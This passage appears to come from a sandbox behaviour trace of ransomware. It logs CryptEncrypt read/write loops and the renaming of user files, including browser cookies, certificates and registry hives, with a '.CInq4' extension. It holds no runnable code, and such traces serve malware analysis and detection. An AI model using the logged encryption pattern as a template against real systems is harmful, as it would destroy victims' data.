dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.106] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.106] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.106] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.106] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.106] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.106] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.106] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.106] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.645] MoveFileW (lpExistingFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.CInq4" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.cinq4")) returned 1 [0042.666] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0042.666] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0042.723] MoveFileW (lpExistingFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.CInq4" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.cinq4")) returned 1 [0042.730] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0042.731] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0043.257] MoveFileW (lpExistingFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.CInq4" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.cinq4")) returned 1 [0043.273] MoveFileW (lpExistingFileName="c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), lpNewFileName="c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml.CInq4" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml.cinq4")) returned 1 [0043.294] MoveFileW (lpExistingFileName="c:\\users\\default\\contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="c:\\users\\default\\contacts\\Administrator.contact.CInq4" (normalized: "c:\\users\\default\\contacts\\administrator.contact.cinq4")) returned 1 [0043.296] MoveFileW (lpExistingFileName="c:\\users\\default\\contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), lpNewFileName="c:\\users\\default\\contacts\\desktop.ini.CInq4" (normalized: "c:\\users\\default\\contacts\\desktop.ini.cinq4")) returned 1 [0043.313] MoveFileW (lpExistingFileName="c:\\users\\default\\desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), lpNewFileName="c:\\users\\default\\desktop\\desktop.ini.CInq4" (normalized: "c:\\users\\default\\desktop\\desktop.ini.cinq4")) returned 1 [0043.328] MoveFileW (lpExistingFileName="c:\\users\\default\\documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), lpNewFileName="c:\\users\\default\\documents\\desktop.ini.CInq4" (normalized: "c:\\users\\default\\documents\\desktop.ini.cinq4")) returned 1 [0043.334] MoveFileW (lpExistingFileName="c:\\users\\default\\downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), lpNewFileName="c:\\users\\default\\downloads\\desktop.ini.CInq4" (normalized: "c:\\users\\default\\downloads\\desktop.ini.cinq4")) returned 1 [0043.350] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), lpNewFileName="c:\\users\\default\\favorites\\desktop.ini.CInq4" (normalized: "c:\\users\\default\\favorites\\desktop.ini.cinq4")) returned 1 [0043.356] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), lpNewFileName="c:\\users\\default\\favorites\\links\\desktop.ini.CInq4" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini.cinq4")) returned 1 [0043.358] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), lpNewFileName="c:\\users\\default\\favorites\\links\\Web Slice Gallery.url.CInq4" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.cinq4")) returned 1 [0043.365] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\msn websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), lpNewFileName="c:\\users\\default\\favorites\\msn websites\\MSN Autos.url.CInq4" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.cinq4")) returned 1 [0043.367] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\msn websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="c:\\users\\default\\favorites\\msn websites\\MSN Entertainment.url.CInq4" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.cinq4")) returned 1 [0043.368] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\msn websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), lpNewFileName="c:\\users\\default\\favorites\\msn websites\\MSN Money.url.CInq4" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.cinq4")) returned 1 [0043.370] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\msn websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), lpNewFileName="c:\\users\\default\\favorites\\msn websites\\MSN Sports.url.CInq4" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.cinq4")) returned 1 [0043.371] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\msn websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), lpNewFileName="c:\\users\\default\\favorites\\msn websites\\MSN.url.CInq4" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.cinq4")) returned 1 [0043.373] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\msn websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="c:\\users\\default\\favorites\\msn websites\\MSNBC News.url.CInq4" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.cinq4")) returned 1 [0043.381] MoveFileW (lpExistingFileName="c:\\users\\default\\links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), lpNewFileName="c:\\users\\default\\links\\desktop.ini.CInq4" (normalized: "c:\\users\\default\\links\\desktop.ini.cinq4")) returned 1 [0043.386] MoveFileW (lpExistingFileName="c:\\users\\default\\music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), lpNewFileName="c:\\users\\default\\music\\desktop.ini.CInq4" (normalized: "c:\\users\\default\\music\\desktop.ini.cinq4")) returned 1 [0043.678] MoveFileW (lpExistingFileName="c:\\users\\default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), lpNewFileName="c:\\users\\default\\NTUSER.DAT.CInq4" (normalized: "c:\\users\\default\\ntuser.dat.cinq4")) returned 1 [0043.693] MoveFileW (lpExistingFileName="c:\\users\\default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), lpNewFileName="c:\\users\\default\\NTUSER.DAT.LOG.CInq4" (normalized: "c:\\users\\default\\ntuser.dat.log.cinq4")) returned 1 [0043.694] MoveFileW (lpExistingFileName="c:\\users\\default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), lpNewFileName="c:\\users\\default\\ntuser.ini.CInq4" (normalized: "c:\\users\\default\\ntuser.ini.cinq4")) returned 1 [0043.700] MoveFileW (lpExistingFileName="c:\\users\\default\\pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), lpNewFileName="c:\\users\\default\\pictures\\desktop.ini.CInq4" (normalized: "c:\\users\\default\\pictures\\desktop.ini.cinq4")) returned 1 [0043.723] MoveFileW (lpExistingFileName="c:\\users\\default\\saved games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), lpNewFileName="c:\\users\\default\\saved games\\desktop.ini.CInq4" (normalized: "c:\\users\\default\\saved games\\desktop.ini.cinq4")) returned 1 [0043.739] MoveFileW (lpExistingFileName="c:\\users\\default\\searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), lpNewFileName="c:\\users\\default\\searches\\desktop.ini.CInq4" (normalized: "c:\\users\\default\\searches\\desktop.ini.cinq4")) returned 1 [0043.750] MoveFileW (lpExistingFileName="c:\\users\\default\\videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), lpNewFileName="c:\\users\\default\\videos\\desktop.ini.CInq4" (normalized: "c:\\users\\default\\videos\\desktop.ini.cinq4")) returned 1 [0043.916] MoveFileW (lpExistingFileName="c:\\users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), lpNewFileName="c:\\users\\desktop.ini.CInq4" (normalized: "c:\\users\\desktop.ini.cinq4")) returned 1 [0043.929] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\0JkVowKW67ScNs.xlsx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\0jkvowkw67scns.xlsx"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\0JkVowKW67ScNs.xlsx.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\0jkvowkw67scns.xlsx.cinq4")) returned 1 [0043.933] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\3tOLu7_.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\3tolu7_.bmp"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\3tOLu7_.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\3tolu7_.bmp.cinq4")) returned 1 [0043.935] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\8hEZdFxVBi.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\8hezdfxvbi.png"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\8hEZdFxVBi.png.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\8hezdfxvbi.png.cinq4")) returned 1 [0043.938] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\BNzgUVXC_-s-x2x5xNT.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bnzguvxc_-s-x2x5xnt.png"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\BNzgUVXC_-s-x2x5xNT.png.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bnzguvxc_-s-x2x5xnt.png.cinq4")) returned 1 [0043.942] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\bYUv.ots" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\byuv.ots"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\bYUv.ots.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\byuv.ots.cinq4")) returned 1 [0043.946] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\d-BXDU.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\d-bxdu.bmp"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\d-BXDU.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\d-bxdu.bmp.cinq4")) returned 1 [0043.948] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\dihBYw6hJ7.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\dihbyw6hj7.rtf"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\dihBYw6hJ7.rtf.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\dihbyw6hj7.rtf.cinq4")) returned 1 [0043.962] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\e371x5yB-BXL9.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\e371x5yb-bxl9.jpg"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\e371x5yB-BXL9.jpg.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\e371x5yb-bxl9.jpg.cinq4")) returned 1 [0043.966] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\JpLHr.ppt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\jplhr.ppt"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\JpLHr.ppt.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\jplhr.ppt.cinq4")) returned 1 [0043.968] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\KKJxf.odt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\kkjxf.odt"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\KKJxf.odt.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\kkjxf.odt.cinq4")) returned 1 [0043.971] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\kSYMgW4ng7d7 1NA.pdf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ksymgw4ng7d7 1na.pdf"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\kSYMgW4ng7d7 1NA.pdf.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ksymgw4ng7d7 1na.pdf.cinq4")) returned 1 [0043.973] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mkaLZ5.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mkalz5.bmp"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mkaLZ5.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mkalz5.bmp.cinq4")) returned 1 [0043.983] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0043.983] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0043.984] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json.cinq4")) returned 1 [0043.990] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0043.990] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0044.000] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json.cinq4")) returned 1 [0044.011] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json.cinq4")) returned 1 [0044.015] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0044.016] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0044.030] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db.cinq4")) returned 1 [0044.032] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini.cinq4")) returned 1 [0044.046] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite.cinq4")) returned 1 [0044.073] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite.cinq4")) returned 1 [0044.081] MoveFileW 